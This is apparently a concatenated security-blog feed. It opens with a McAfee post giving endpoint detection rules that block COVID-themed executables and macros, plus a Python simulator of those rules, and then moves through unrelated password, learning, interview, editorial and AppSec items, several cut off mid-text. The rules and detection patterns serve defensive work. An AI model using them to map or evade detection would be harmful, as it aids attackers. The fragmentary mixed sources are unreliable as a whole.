The best way to protect yourself is not to open unsolicited emails, since malicious files are most often distributed as email attachments or through links in email. To help identify malicious emails, please read this blog: How to Spot Phishing Lures

Global Threat Intelligence (GTI)

McAfee GTI applies heuristics and file reputation checks to suspicious files during on-access and on-demand scanning, which can provide near real-time protection. The following KB article contains the steps for changing the GTI sensitivity level in McAfee products.

You can configure the sensitivity level that McAfee GTI uses when it determines if a detected sample is malware. The McAfee GTI sensitivity level is set to Medium by default. Configure the sensitivity level for each scanner in the On-Access Scan and On-Demand Scan settings.

Sensitivity Level:

  • Very low — High-confidence detections only. The least aggressive GTI setting and the least prone to false positives.
  • Low — The minimum recommended setting for systems with a strong security footprint.
  • Medium — The default setting on most products.
  • High — Use this setting for systems or areas that are regularly infected.
  • Very high — The most aggressive setting. Detections at this level are presumed malicious but have not been fully tested. McAfee recommends it for systems that require the highest security; it may also produce a higher false-positive rate.

Endpoint Security (ENS) Product

ENS is our endpoint security product and provides a broad range of default protection, self-protection and detection capabilities.

Expert Rules

Expert Rules are text-based custom rules that can be created in the Exploit Prevention policy in ENS Threat Prevention 10.5.3 and above.

Expert Rules provide additional parameters and far more flexibility than the custom rules that can be created in the Access Protection policy. They let system administrators control and monitor an endpoint at a very granular level. This is a useful toolkit for administrators and SOCs, allowing quick creation and deployment of powerful extensions to the product’s detection and protection capabilities: you can author monitoring and blocking rules for process creation, file access, memory injection, module load and unload events, and more.

We recommend reading the following blog which describes how to use Expert Rules and gives some good examples which would help block potentially malicious activity.


Here are some examples of quick Expert Rules you can formulate to use on your endpoints against COVID-19 related threats.

Example Rule – 1

The following rule blocks the launch of corona- or covid-named executables run directly from inside an archived email attachment. WinRAR extracts such a file to a Rar* folder under the user’s local temp directory before running it, and that path is what the rule targets; the actor is any process (OBJECT_NAME “**”), and the match is on process creation (-access “CREATE”).

    Rule {
        Process {
            Include OBJECT_NAME { -v "**" }
        }
        Target {
            Match PROCESS {
                Include OBJECT_NAME { -v "**\\appdata\\Local\\temp\\Rar*\\*corona*.exe" }
                Include OBJECT_NAME { -v "**\\appdata\\Local\\temp\\Rar*\\*covid*.exe" }
                Include -access "CREATE"
            }
        }
    }


Example Rule – 2

The following rule blocks macro execution in corona- or COVID-named documents opened from email attachments or download locations. It matches winword.exe launched with such a document name on its command line and stops it loading the VBA runtime libraries (vbe7.dll and vbe7intl.dll), which Word only loads when a macro is about to run.

    Rule {
        Process {
            Include OBJECT_NAME { -v "**\\winword.exe" }
            Include PROCESS_CMD_LINE { -v "**corona**" }
            Include PROCESS_CMD_LINE { -v "**covid**" }
        }
        Target {
            Match SECTION {
                Include OBJECT_NAME { -v "**\\vbe7.dll" }
                Include OBJECT_NAME { -v "**\\vbe7intl.dll" }
            }
        }
    }


Example Rule – 3

The following Expert Rule prevents a particular version range (4.5.x) of a hypothetical “FooBar Communications” application from executing. Rather than matching on a path, it matches on the description and version fields of the executable’s version resource, so renaming or relocating the binary does not evade it.

    Rule {
        Process {
            Include OBJECT_NAME { -v "**" }
        }
        Target {
            Match PROCESS {
                Include DESCRIPTION { -v "FooBar Communications " }
                Include VERSION { -v "4,5,**" }
                Include -access "CREATE"
            }
        }
    }


Expert Rules are flexible enough that a SOC analyst or rule author can first deploy a rule in report-only mode, check the environment for false positives, and only then switch it to block mode.
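As an added example (not McAfee’s code and not part of the original post), the following Python script models Example Rules 1 and 2 as data, translates their -v globs into regular expressions, and evaluates them against a handful of constructed process-creation and module-load events, returning what each rule would flag. It lets you exercise a rule’s path patterns, and the difference between its report and block settings, offline before pushing it to endpoints. The wildcard semantics (“**” spans path separators, “*” stays within one path component, matching is case-insensitive), the way Include statements combine, the event layout and every file path are assumptions of this example, not taken from vendor documentation.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Tuple


def expert_glob_to_regex(value: str) -> re.Pattern:
    """Translate the -v value of an Expert Rule Include into a regex.

    Assumed wildcard semantics (an assumption of this example, not taken
    from vendor documentation):
      **  any run of characters, path separators included
      *   any run of characters inside a single path component
      ?   exactly one character inside a single path component
    A doubled backslash in the rule text stands for one literal backslash,
    and matching is case-insensitive, as Windows paths are.
    """
    pattern = value.replace("\\\\", "\\")
    parts, i = [], 0
    while i < len(pattern):
        if pattern.startswith("**", i):
            parts.append(".*")
            i += 2
        elif pattern[i] == "*":
            parts.append(r"[^\\]*")
            i += 1
        elif pattern[i] == "?":
            parts.append(r"[^\\]")
            i += 1
        else:
            parts.append(re.escape(pattern[i]))
            i += 1
    return re.compile("^" + "".join(parts) + "$", re.IGNORECASE)


@dataclass
class ExpertRule:
    """Reduced model of one Rule { Process { ... } Target { Match ... } } block."""
    name: str
    actor_names: List[str]    # Process { Include OBJECT_NAME ... }
    target_kind: str          # Target { Match PROCESS | SECTION ... }
    target_names: List[str]   # Include OBJECT_NAME inside the Match
    actor_cmdlines: List[str] = field(default_factory=list)  # PROCESS_CMD_LINE; empty = any
    mode: str = "report"      # run as "report" first; switch to "block" after reviewing hits

    def matches(self, event: Dict[str, str]) -> bool:
        # Assumed combination: Includes of the same type are alternatives,
        # and the different types in a block must all be satisfied.
        if event["kind"] != self.target_kind:
            return False
        if not any(expert_glob_to_regex(p).match(event["actor"]) for p in self.actor_names):
            return False
        if self.actor_cmdlines and not any(
            expert_glob_to_regex(p).match(event["cmdline"]) for p in self.actor_cmdlines
        ):
            return False
        return any(expert_glob_to_regex(p).match(event["target"]) for p in self.target_names)


# Example Rules 1 and 2 from the page, transcribed into the model above.
RULES = [
    ExpertRule("Rule 1", actor_names=[r"**"], target_kind="PROCESS",
               target_names=[r"**\\appdata\\Local\\temp\\Rar*\\*corona*.exe",
                             r"**\\appdata\\Local\\temp\\Rar*\\*covid*.exe"]),
    ExpertRule("Rule 2", actor_names=[r"**\\winword.exe"], target_kind="SECTION",
               target_names=[r"**\\vbe7.dll", r"**\\vbe7intl.dll"],
               actor_cmdlines=[r"**corona**", r"**covid**"]),
]

WINWORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
VBE7 = r"C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL"

# Constructed sample events; every path here is hypothetical.
SAMPLE_EVENTS = [
    # executable run straight out of an archive attachment via WinRAR's temp folder
    {"kind": "PROCESS", "actor": r"C:\Program Files\WinRAR\WinRAR.exe", "cmdline": "",
     "target": r"C:\Users\bob\AppData\Local\Temp\Rar$DIa4120.1234\Corona-Virus-Map.exe"},
    # same file name, already saved to Downloads: outside Rule 1's path glob
    {"kind": "PROCESS", "actor": r"C:\Windows\explorer.exe", "cmdline": "",
     "target": r"C:\Users\bob\Downloads\Corona-Virus-Map.exe"},
    # Word opens a COVID-named document and loads the VBA runtime (a macro is running)
    {"kind": "SECTION", "actor": WINWORD,
     "cmdline": '"%s" /n "C:\\Users\\bob\\Downloads\\COVID-19_update.docm"' % WINWORD,
     "target": VBE7},
    # Word loads the VBA runtime for an unrelated document: not in Rule 2's scope
    {"kind": "SECTION", "actor": WINWORD,
     "cmdline": '"%s" /n "C:\\Users\\bob\\Documents\\budget.docm"' % WINWORD,
     "target": VBE7},
]


def evaluate(rules: List[ExpertRule], events: List[Dict[str, str]]) -> List[Tuple[str, str, str]]:
    """Return (rule name, action, target) for every event some rule matches."""
    hits = []
    for event in events:
        for rule in rules:
            if rule.matches(event):
                action = "BLOCK" if rule.mode == "block" else "REPORT"
                hits.append((rule.name, action, event["target"]))
    return hits


if __name__ == "__main__":
    for hit in evaluate(RULES, SAMPLE_EVENTS):
        print(hit)
```

Run against the sample events, only the archive-launched executable and the macro-bearing COVID document are reported; the copy in Downloads and the unrelated document are not, which is the kind of scoping check worth doing on real process telemetry before a rule leaves report-only mode.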

JTI Rules

JTI rules are released fortnightly and target suspicious process chains and command-line threats; they also detect suspicious files based on their location and characteristics. From the collection of JTI rules, we recommend enabling a few of the Evaluate or HighOn rules for advanced threat protection. These rules can be switched on by default from the ePO console.

  • Protection from suspicious command-line parameters, where malware invokes PowerShell with command-line parameters for malicious activity. This rule is identifiable in the ePO console as rule ID 262.
    • Rule 262 – Identify suspicious command parameter execution for Security rule group assignments
  • Protection from malware launching suspicious command-line script interpreters such as WScript, CScript and PowerShell. This rule is identifiable in the ePO console as rule ID 320.
    • Rule 320 – Prevent cmd.exe from launching other script interpreters such as CScript or PowerShell (by default only in Security rule group assignments)
  • Protection from files executing from non-standard locations such as \windows\fonts or \windows\resources. This rule also protects against wmiprvse.exe being spawned from suspicious processes such as foobar.exe. This rule is identifiable in the ePO console as rule ID 238.
    • Rule 238 – Identify abuse of common processes spawned from non-standard locations

Newly released JTI rules normally ship in the Evaluate or HighOn setting. We recommend that ePO admins go through the product release notes and enable the rules that suit their environment.

Enable AMSI

The ENS AMSI integration is set to observe mode by default. We recommend changing it to block mode, as it detects the vast majority of script-based threats, which are often email-borne, such as JavaScript downloaders.

Please read this blog to find out more about AMSI and which threats it helps detect.

Suspicious Email attachment detection

As shown in this report, email remains a top vector for attackers. McAfee endpoint products use a combination of product features and content for increased agility. In McAfee Endpoint Security (ENS) 10.5 and above, this protection is enabled via the ‘Detect suspicious email attachments’ option and maintained through DAT content. The capability goes beyond the protection offered by email clients: it blocks not only applications and scripts but a variety of threat types in their native form, as well as those compressed or contained within archives and other formats.

For a guide on how to enable this please read this blog: McAfee Protects Against Suspicious Email Attachments

ATP (Adaptive Threat Protection)

McAfee ATP (Adaptive Threat Protection) uses machine learning via our Real Protect module, which provides pre- and post-execution monitoring of threats using ML models deployed locally and in the cloud. In addition, ATP provides an additional layer of protection with advanced rules that evaluate threats based on static and behavioral features.

We recommend enabling Real Protect at least at its default settings. ATP rules come in three forms: Evaluate, DefaultOn and HighOn.

  • Evaluate rules are tested in the field by McAfee to determine whether they are robust enough to detect malicious activity. They do not block by default but log activity to the ATP log. Administrators can switch such rules to Block via ePO. McAfee researchers regularly analyze the performance of these rules and refine them so they can be promoted to DefaultOn (rule assignment Balanced, the default) or HighOn (rule assignment Security). Before manually enabling a rule in Block mode, observe its triggers in the ATP logs to make sure it suits your environment.
  • DefaultOn rules are high-confidence rules that block by default within ENS ATP and MVISION Endpoint. Administrators can turn them off from within ePO if required.
  • HighOn rules detect behavior that is known to be malicious but may overlap with some non-malicious applications. They work as Evaluate in the Balanced posture but as DefaultOn in the Security posture. Administrators are encouraged to use this setting during periods of high malware activity for monitoring and default blocking.

For details on Rule descriptions, security posture and settings please refer this KB Article: https://kc.mcafee.com/corporate/index?page=content&id=KB82925

Unified Cloud Edge

Get a SASE (Secure Access Service Edge) architected web protection solution such as McAfee’s Unified Cloud Edge. This delivers anytime/anywhere protection (including work-from-home scenarios) for web, cloud-native and cloud-to-cloud traffic, whether you are on a VPN or directly connected to the internet. For example, even if you follow a link from a malicious email or visit a hostile site while off the VPN, you continue to benefit from GTI and cloud-based threat intelligence that protects against malicious sites and downloads. Unified Cloud Edge can expand your URL protection capabilities by providing the following:

  1. Malicious URL – blocked via GTI and URL
  2. Download from a benign URL (for example onedrive.live.com) – can be blocked via tenant restrictions: for example, the corporate OneDrive tenant is permitted while personal (live.com) or other companies’ tenants are blocked.
  3. Malicious download – blocked by the cloud gateway file engines, including AV, GAM and GTI.
  4. Third-party malicious upload (placing a payload in an open share on the company OneDrive) – blocked via API-based scanning of corporate-sanctioned services, using the same AV/GAM/GTI layers of inspection.

MVISION Unified Cloud Edge protects data from device to cloud and prevents cloud-native threats that are invisible to the corporate network. This creates a secure environment for the adoption of cloud services, enabling cloud access from any device and allowing ultimate workforce productivity.

Conclusion

As you can see from this report, there are various threats which are taking advantage of this pandemic. We will continue to enable our customers to use our recommendations to remain safe during this challenging time. Be extra vigilant online and stay safe and healthy always!

As we continually provide recommendations based on current data, we encourage regular reading of McAfee blogs where you will find regular updates on threat patterns and protection information.

The post COVID-19 – Malware Makes Hay During a Pandemic appeared first on McAfee Blogs.

World Password Day 2020

Are Your Password Habits Keeping You Safe Online?

Learning how to navigate our entire lives online has definitely been a steep learning curve for many of us over the last few weeks. Whether it’s working from home, helping our kids learn from home, conducting ‘wine time’ from home or even doing our Zumba classes from home – it’s essential now more than ever that we are doing this safely. And one of the most powerful yet simple ways we can shore up our online safety is by being smart with our passwords.

World Password Day – Take A Minute To Check Your Approach

Today is World Password Day – the perfect opportunity to ensure we are doing all we can to manage our online logins. It’s quite unsettling to think that one of the easiest ways for cybercriminals to get their hands on the sensitive information we store in our online accounts is through our passwords.

Passwords act like a key to our digital identity. Not only do they allow us to bank, shop, work, learn, date and socialise online, they also protect us. Strong, complex passwords ensure all the information we store online (aka our digital assets) is protected, which is essential for our privacy and our financial and personal security.

So, let’s use this annual event to make sure we are doing all we can to lock down our precious online data by managing our passwords properly.

Same Password For Every Account? – Rookie Error

If I had to count up all my online accounts on my fingers and toes, I would quickly run out of body parts! With so many logins to remember, many of us end up using the same password for every account. And while that might seem practical, it in fact makes us very vulnerable. Just think about this scenario: if you become the victim of an online scam and the password to one of your online accounts is stolen, a cybercriminal can then use that same password to access all your online accounts.

So, before you know it, a cybercriminal can access your emails, bank accounts, online shopping accounts – that may have stored credit cards, private photo and video files.

What You Can Do TODAY to Ensure your Password Habits are Keeping you Safe

Yes, we are all human which means we are going to take shortcuts. I get it! I love shortcuts – I’m a fan of using pasta sauce from the jar! But if there’s one area where shortcuts should NOT be used it’s with passwords. So, here are my top suggestions on how you can stop your private online data falling into the wrong hands and block cybercriminals at the very first point of entry.

  1. Commit to NOT Using Common Passwords

If your password is ‘123456’ then you need to change it now. The UK’s National Cyber Security Centre showed in a survey last year that this is the most commonly used password. In fact, in the eight years I’ve been doing this job, this password has annually topped surveys.

Passwords are the gateway to our digital lives. To avoid giving the wrong people access to your accounts, make sure you create strong and unique passwords. This means including numbers, lowercase and uppercase letters and symbols. The more complex your password, the more difficult it is to crack. Why not create a nonsensical phrase or sentence? And always avoid using simple personal details within your password altogether. Your date of birth, middle name or pet names are things cybercriminals can trace through your social media accounts.

  2. Same Password For Every Account? Think Again

The idea of having one password across all online accounts is alluring because let’s admit it…we’ve all been locked out of an account after failing to remember the password! While having one password to remember for all accounts seems to make life easier, it increases the risk of your vital online data being compromised at once across different accounts. So, ensure that your logins are unique for every account to avoid having all your accounts become vulnerable in case you are hacked.

  3. ALWAYS Select Multi-Factor Authentication

Wherever possible, embrace multifactor authentication (MFA) for online accounts. MFA is a security system that requires more than one way of identification before gaining access to an account. Most commonly, it involves a security code sent to your smartphone, security questions or even a fingerprint, on top of the password. An extra layer of defence to stop sham access to vital online data? Yes please!

  4. Give Your Passwords a Health Check

What better way to check the health of your passwords than to see whether they’ve been compromised in a data breach. The website www.haveibeenpwned.com.au is an effective way to check whether a cybercriminal has discovered your passwords. If yes, give your passwords an overhaul and change them wherever they are used to safeguard your data.

  5. Employ A Password Manager

If you are currently feeling a tad overwhelmed at the thought of creating and managing unique passwords for your multiple online accounts, do not stress – I have a solution – a password manager. This marvellous software program will create random and complex passwords for each of your accounts and store them securely, which means you don’t need to! All you need to do is remember the master password!! When choosing a password manager, ensure it uses multi-factor authentication to identify you, e.g. facial recognition, fingerprint and a password.

If you have a spare 30 minutes today then please take the time to give your password habits an overhaul. I know we are all so flat out juggling work and kids at the moment but a careless approach to password security is no different to a careless approach to home security. So, get your passwords working for you so you can continue living your life online – especially Friday night ‘virtual drinks’!!

The post World Password Day 2020 appeared first on McAfee Blogs.

Personal and Professional Development From Home

Like so many of us, I’m doing my best to look forward. While everyone’s situation is different from family to family, community to community, and even from country to country, one thing I hope is that you have the chance to look forward too—like what you want your life to look like once we’ve moved past the days we’re in right now.

That’s what inspired this article. I wanted to share some online resources that can help you take this time to do something for yourself and pursue some degree of personal or professional development if you can. After all, if we can work it in, now’s the time for a little self-improvement.

For me, I’m diving into subject matter that largely takes me outside of technology and my daily work. One of my favorites right now is gardening. I’m taking a Master Class on gardening from Ron Finley, a man who started planting vegetables in the dirt parking strip outside his home in South Central Los Angeles. At first, Ron was cited for gardening without a permit. After that, he got the local laws changed so that public planting could not only continue but also thrive. In short order, his urban gardening readily turned into a movement based on the idea that everyone in every community can grow their own healthy food.

The class is absolutely inspiring, as is seeing Ron do things like turn an old dresser drawer into a garden. He has plenty of tricks like that he can show you. And I can tell you this—I certainly look at my garden (and what I’m eating!) through new eyes now thanks to him.

Along those lines, I’ve put together a few resources for those of you who want to pursue something that’s always interested you or something new altogether. Once you start researching all the personal and professional development options available, you’ll see plenty of opportunities—and ways to look at your world through new eyes too.

Free Classes from Open Culture

First off, Open Culture is an amazing resource overall. It got its start about 14 years ago with the mission of scouring the web for high-quality educational and cultural resources, all of them free. Today, it’s a massive curation effort packed with hundreds, and even thousands, of movies, lectures, eBooks, videos, university courses, audio books, and so much more across numerous collections. Again, all free.

For example, the page dedicated to 1,500 Free Online Courses from Top Universities is everything you’d expect it to be. And then some. The categories range from Art & Art History to Writing & Journalism, with Business, Economics, Literature, Psychology, and more in between. If picking up a new language or dusting off an old one that’s been on the shelf since your high school days is on your mind, they also have links to learn 48 different languages. In addition, Open Culture keeps a growing list of dozens of free textbooks as well.

University-Led Learning

Numerous higher learning institutions have offered free coursework online for some time now. They’re an outstanding resource for personal enrichment, with lectures, projects, and materials often drawn straight from campus classrooms. For example:

Open Yale Courses

Open Yale Courses offers “a full set of class lectures produced in high-quality video accompanied by such other course materials as syllabi, suggested readings, and problem sets.” Classes range from history and econ to literature and psychology.

Stanford University

Stanford University offers free courses as well and on an interesting blend of topics. If you’re interested in “Child Nutrition and Cooking” or an “Introduction to the Internet of Things,” Stanford’s free course catalog is a great place to start.

Open Learn

Open Learn courses are part of a platform created by the UK’s The Open University as part of its Royal Charter commitment to support the wellbeing of the community. Here you’ll find thousands of resources spread across eight broad categories.

edX

edX has more than 2,800 online courses from roughly 140 institutions across the globe—including MIT, Harvard, UC Berkeley, Boston University, the University of Edinburgh, the University of Tokyo, and Oxford to name a few. Many classes are free, and some offer a formal certificate of completion for a fee.

Mixes of Free and Paid Learning

Udemy

Udemy has 100,000 online courses. While the emphasis is on paid content, simply filter your search for “free” items and you’ll find numerous options there.

Coursera

Coursera provides free courses from university and industry partners with access to on-demand video lectures, homework exercises, and community discussion forums. Degrees and certificates are available through their paid options as well.

iTunes U

iTunes U provides yet another learning opportunity for iPhone, iPad, and iPod Touch users. While the app is designed to help teachers create lesson plans and collaborate with students, it’s also great for the rest of us. It offers free access to a large collection of free educational content in “public courses from leading schools, universities, museums, and cultural institutions.”

Codecademy

Codecademy focuses on web development, programming and computer science, and data science. It has a free option for a limited number of classes, plus a paid monthly membership offers more content and guidance. As of this writing, a free trial membership is available.

Big ideas for small business

Maybe you’re taking this opportunity to launch a little side business or you’re looking to brush up on some business skills in general. If so, you can visit the U.S. Small Business Administration Learning Center, which is packed with great content that covers broad business topics. Although some of the content is specific to the U.S., plenty of it can benefit all—such as articles on business planning, social media marketing, and other programs for mastering daily operations.

Learn Safely Online

As always, give your security a good look as you embark on any classwork online. My recent article, “How to Stay Secure While Distance Learning” offers some great advice for university students, yet it certainly applies to the rest of us too as we learn online. Also, consider using protection that keeps you safer while doing your reading and researching online. That’ll help you go about your studies without worrying about sketchy links, misclicks, typos, or bad downloads that could land you on a malicious site or drop adware, spyware, or viruses on your device.

Stay Updated

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Personal and Professional Development From Home appeared first on McAfee Blogs.

How to Ace Your Video Interview: Job Hunting From Home

How to Ace Your Video Interview: Job Hunting from Home, Part Two  

So, it’s game day. Your online video interview is about to begin, and you’re feeling good. Okay, so maybe there are just a few nerves, but you know you’ve got this. The space you’ve set up for your call is all in order and your technology is ready to go. You’ve prepped for this moment and it shows.

In my last article, we covered the pre-game day basics to get your location and technology ready for an online interview. Here, we’ll talk about the interview itself. Once again, I caught up with Shawn Hutcherson, our Lead Talent Acquisition Partner here at McAfee, for his insight and experience as a person who’s conducted numerous interviews online.

And here’s the good news: while a video interview may be new to you, plenty of what happens in a good face-to-face interview happens in a good video interview too. We’ll cover exactly that, along with a number of pointers that are specific to video interviews—so you can absolutely ace yours.

Prior to the Interview:

As always, the foundation of a good interview is built upon how you prepare. So much of what you’ll see here should look comfortingly familiar. There are a few new wrinkles to consider with a video interview, just as you’d expect, so here’s a quick rundown of things you can do in the days, and moments, leading up to your call:

Check up on company news.

Did the company have a recent product release, a change in management, or make any other noteworthy moves? You’ll want to know about any such news as it may reshape your understanding of the company and help form some good questions to ask. In either case, it’s a chance to show an interviewer that you’ve done your homework.

Look up your interviewer(s) on LinkedIn.

Aside from providing you some background, it’s also a way to spot common interests that make for easy icebreakers. Likewise, a little familiarity can make for a smoother conversation in the long run if you spot other things like shared experiences and mutual acquaintances.

Grab a pad of paper and fill it up with a few questions.

Having questions prepared shows interest on your part, and you can also jot down any items of interest that came up in your research. Be ready to have this at your side during your interview. Keeping it all together in a nice folio or binder will look extra-sharp too.

“Don’t change anything on game day.”

More plainly, keep to your regular everyday routine. If you drink two cups of coffee in the morning, stick with two. No need to “amp up” with that extra cup. You know your daily rhythm and what keeps you feeling good, so stick with it. Also, it’s a good idea to keep a bottle of water handy. You’ll be chatting for a while, so keep hydrated.

Clear your computer desktop.

Another thing to keep in mind is to close unnecessary apps, browser windows, or anything else that could create a distraction of any kind. For example, any apps that might pop up an alert or notification on your computer desktop, like an email or chat app, should be closed. Likewise, close browser windows so that you don’t share any of them by accident—such as your social media feed, any sensitive information, and so forth.

Check your space.

Look around the room for other things that could interrupt the call in any way. Put your phone on silent (and make sure it’s charged if you need to quickly switch the interview over to a phone call instead). Turn off any loud fans or other appliances that could create background noise. Also check in with your family or roommates one last time and let them know that you’re heading into your interview and when you expect to be done.

Have a backup plan.

So, let’s say the internet connection is sort of lousy or the two of you experience some sort of technical glitch. Have phone numbers handy—and perhaps a draft email ready to go for such situations. Last-minute emails written hastily in the wake of a dropped session can be prone to typos. A professionally written email will go a long way.

A Quick Word on How to Dress for a Video Interview

Granted, working from home may have us dressing far more informally than we ever would in the office, even on the most casual of “Casual Fridays,” so this is a good opportunity to revisit the notion of how to dress for a video interview. The answer is much the same as any other interview as you’ve had before: dress one step above where you think people would normally dress at that employer. For example, at McAfee, we have a pretty relaxed culture, so a smart “business casual” look for an interview works great for us. If the employer is more formal, proper business attire is the way to go. And if you have a favorite shirt, dress, or earrings wear them. Overall, the best advice is, “Look good, feel good, play good.” When you’re dressed comfortably and for the occasion, a great conversation can come rather naturally.

During the Interview

An old interview axiom is to show up early. The same applies here. Click on that link your interviewer provided a good 10 to 15 minutes early and put yourself on mute. This way, you can address any glitches with plenty of time to spare—like, “Oh, this link isn’t actually working. I’d better shoot off an email or text to get that straightened out.”

So let’s say you connect without a hitch. The camera’s on and you’re live. Here are a few things to keep in mind:

Build a rapport.

In virtual situations, it’s easy to feel like you have to get right down to business. Actually, this is your chance to settle in. It’s absolutely okay to ask, “How are you doing today?” or chat about your families or how you’ve been spending your time for a bit. Think back to that LinkedIn search you did. You may have mutual friends or interests. Bring them up.

Feel free to share.

If you’re doing this at home, there’s absolutely no need to apologize for that. Lean into it with something like, “Glad to be here! And hey, just so you know, I have a parakeet and a shih tzu, so there may be a little noise in the background.” And who knows, your interviewer may have a parakeet and a shih tzu too—or some other pets or family in the background. So really, this is another opportunity to connect.

Keep up that eye contact.

This is another tricky mannerism to master in a virtual situation but try to imagine as if the interviewer is in the room with you. That could be a coffee house or a comfortable conference room. Keep your attention on the person and face the screen so that you maintain eye contact. After all, no one wants to see you turn your head and talk to your earlobe.

Remember those non-verbal cues.

Related to the above, a great deal of our communication comes across non-verbally. Smile when you speak if it feels right and nod as you listen. Posture, just like in a face-to-face interview, is important too. Sit straight, yet comfortably, and feel free to lean in and back again with the natural flow of conversation.

Give yourselves some space.

Another pitfall of virtual conversations is the long monologue. Ever been on a lousy conference call where someone fails to pause and let others talk? Or how about when people step on each other’s sentences? You can avoid faux pas like those by interjecting simple open-ended questions into the conversation. Doing so will give your interviewer a chance to show they understand what you’ve conveyed. Also, their answer can lead you into the next topic.

Ask questions in return.

Remember that note pad? Refer to your questions there and actively take notes as you go. This works in your favor a few ways. First off, it showcases your preparedness and that you’re fully engaged in the conversation. Also, it looks and feels natural—far more than sitting relatively idle in a chair for 30, 45, or even a full 60 minutes.

Control what you can.

There’s a fair chance something unexpected will come up. Your grade-schooler may let out a big shout after he drops a jar of peanut butter on his big toe. Your dog may strut in and let you know that it’s time for her walk. While you can’t control these things, you can control your reaction. That’s a strong indicator of how you handle little challenges. See such moments for what they are: a good opportunity. You can turn it into a positive by showing how adaptable and flexible you are.

Getting to know the person on the other end.

As you can see, the video interview shares a great deal with the interviews you’ve had before. Aside from the unique aspects of video job interviews we shared here, there’s something else to keep in mind right now: everyone’s situation is a little different today.

For example, the city you’re in may have rather relaxed rules around social distancing. However, the person you’re speaking with may be weeks into shelter in place restrictions. Before you hop onto that video interview, spend a few moments to empathize with what life may be like for that person right now and keep in mind how their life may be impacted. Also, see this conversation as an opportunity to improve your situation—just like nearly any interview is. Take it for that and focus on the positives.

Last up, a video interview has the similar rewards and challenges for the interviewer. Maybe their shih tzu will chime in during your chat. Or you may hear their kids break out into an impromptu soccer game with a ball of crumpled-up tinfoil. And that’s great! Just as interviewers are getting a glimpse into your world, you’re getting a glimpse into theirs as well. Like you, they’re grateful for the technology that allows us to work together in new ways, develop ourselves professionally, and simply get some face-to-face time with new people.

If you’re job hunting from home or know someone who is, I hope these insights have you feeling a little better about the prospect of a video interview—particularly if the whole thing is new to you. The changes we’re all facing right now are very much on my mind, as are the people and families who’ve had to add the pressure of a job search on top of it all. Once again, check out the Investopedia article on working and job searching from home that I referenced in my first job hunting article; a good portion of it presents an excellent overview of which roles and which firms are particularly WFH-friendly. My hope is that together these articles are of some help, whether for you or your friends and family who are on the hunt. And remember, we’re hiring too!

Stay Updated:

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post How to Ace Your Video Interview: Job Hunting From Home appeared first on McAfee Blogs.

The Guardian view on an NHS coronavirus app: it must do no harm | Editorial

Smartphones can be used to digitally trace Covid-19. But not if the public don’t download an app over privacy fears – or find it won’t work on their device

The idea of the NHS tracing app is to enable smartphones to track users and tell them whether they interacted with someone who had Covid-19. Yet this will work only if large proportions of the population download the app. No matter how smart a solution may appear, mass consent is required. That will not be easy. Ministers and officials have failed to address the trade-offs between health and privacy by being ambiguous about the app’s safeguards.

Instead of offering cast-iron guarantees about the length of time for which data would be held; who can access it; and the level of anonymity afforded, we have had opacity and obfuscation. It is true that we are dealing with uncertainties. But without absolute clarity about privacy the public is unlikely to take up the app with the appropriate gusto.


NICE Released the Spring 2020 eNewsletter

The Spring 2020 NICE eNewsletter has been published to provide subscribers information on academic, industry, and government developments related to the National Initiative for Cybersecurity Education (NICE), updates from key NICE programs, projects, the NICE Working Group, and other important news. To help increase the visibility of NICE, the NICE Program Office will issue regular eNewsletters that feature spotlight articles on academic, industry, and government developments related to NICE, updates from key NICE programs, projects, the NICE Working Group, and other important news. For

Security executives succeeding in the chaotic coronavirus world

I recently interviewed several CSOs and CISOs from the financial services, tech, healthcare, media and other industries to see how they were managing through these turbulent times. Below are the questions I asked them and a summary of their collective wisdom and best practices. While I would love to give these experts all the credit they deserve, all of them spoke on the condition that neither they nor their organizations be identified publicly.

What is your greatest security concern right now?

The collective response to this question is that security executives are most worried about the increase in phishing campaigns and fraud, especially with distracted employees who aren’t as diligent with security hygiene while working from home. As one executive stated, “My greatest concern right now is social engineering resulting from cyberattacks on people wherever they are. High stress means reduced cognitive functions, so attackers may find it easier to do social engineering, which opens the door to everything else.” 


Now Is the Time for Government Agencies to up Their AppSec Game

When it comes to application security (AppSec), Forrester’s report, The State of Government Application Security, 2020, establishes that the government sector is falling behind other industries. And given the nature and quantity of consumer information housed by government agencies, government applications are a prime target for cyberattacks. It’s no wonder only 18 percent [1] of consumers are confident that the federal government is able to secure the personal data of its citizens.

On top of existing concerns related to the government’s security measures, recent global events should also prompt government agencies to evaluate their AppSec solutions. In the past few months, state and federal agencies have been tasked with collecting patient data related to the COVID-19 pandemic and creating new applications for the stimulus relief package. This influx of data is coming at a very vulnerable time: cyber attackers are taking advantage of the fact that IT systems and processes are stretched thin. But it’s not too late for governments to make a change. There are several best practices that, if implemented properly, can help them stay secure.

Step one is implementing prerelease scans, like static analysis, to detect flaws earlier in the software development lifecycle and remediate faster. According to Veracode’s State of Software Security Industry Snapshot, most government agencies are only scanning their applications 12 times a year. As a result, government agencies have accumulated a significant amount of security debt. If they start scanning earlier, and more frequently, governments can find and remediate flaws faster and reduce their security debt.

Step two is embracing DevSecOps practices. With DevSecOps, security shifts to the beginning of the development process. This concept helps save time and money because security flaws and vulnerabilities are recognized and addressed prior to deployment. But embracing DevSecOps is not just about adding prerelease scans, it is about strategically implementing prerelease tools. For example, consider integrating the scans into the developers’ existing tools and processes and automating the scans. The easier it is for the developer to scan, the more applications will be scanned. And, given the current challenges our world is facing, having your scans automated ensures that your business won’t miss a beat.

To learn more ways that government entities can better secure their software, download our webinar, The State of Government Application Security.

[1] Consumer Technographics® North American Healthcare Online Benchmark Recontact Survey 1, 2019 (US), Forrester Research, Inc.

What Caused the SBA Flaw that Exposed Business Owners’ Personal Info?

Current events are reshaping the way we live our everyday lives, and taking a heavy toll on the business world, with organizations of all sizes feeling financial disruption. Business continuity is more essential than ever during the pandemic; not just for customers who rely on products and services, but also for companies that need to keep funds flowing.

